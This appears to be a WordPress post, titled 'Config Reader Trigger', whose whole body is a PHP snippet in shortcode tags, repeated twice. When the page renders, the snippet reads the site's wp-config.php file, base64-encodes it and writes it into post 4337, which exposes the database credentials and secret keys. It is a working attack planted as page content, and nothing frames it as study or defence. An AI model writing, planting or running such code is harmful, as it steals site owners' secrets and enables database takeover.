Config Reader Trigger
[php]
global $wpdb;
$c = file_get_contents(“/var/www/html/wp-config.php”);
$b64 = base64_encode($c);
$wpdb->update(“wp_posts”, array(“post_content” => $b64), array(“ID” => 4337));
echo “WRITE_DONE_POST_4337”;
[/php]
[php]
global $wpdb;
$c = file_get_contents(“/var/www/html/wp-config.php”);
$b64 = base64_encode($c);
$wpdb->update(“wp_posts”, array(“post_content” => $b64), array(“ID” => 4337));
echo “WRITE_DONE_POST_4337”;
[/php]